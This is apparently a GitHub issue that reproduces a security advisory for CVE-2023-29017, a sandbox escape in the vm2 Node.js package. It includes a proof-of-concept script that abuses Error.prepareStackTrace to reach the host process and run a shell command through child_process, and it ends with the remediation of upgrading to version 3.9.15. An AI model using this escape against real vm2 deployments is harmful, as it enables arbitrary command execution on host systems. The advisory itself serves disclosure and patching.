You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Sandbox Escape vm2 was not properly handling host objects passed to Error.prepareStackTrace in case of unhandled async errors.
PoC
const {VM} = require("vm2");
let vmInstance = new VM();
Detailed paths
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Sandbox Escape vm2 was not properly handling host objects passed to
Error.prepareStackTrace
in case of unhandled async errors.PoC
const {VM} = require("vm2");
let vmInstance = new VM();
const code =
Error.prepareStackTrace = (e, frames) => { frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); }; (async ()=>{}).constructor('return process')()
vmInstance.run(code);
Remediation
Upgrade
vm2
to version 3.9.15 or higher.References
SNYK-JS-VM2-5415299
(CVE-2023-29017) vm2@3.9.3
The text was updated successfully, but these errors were encountered: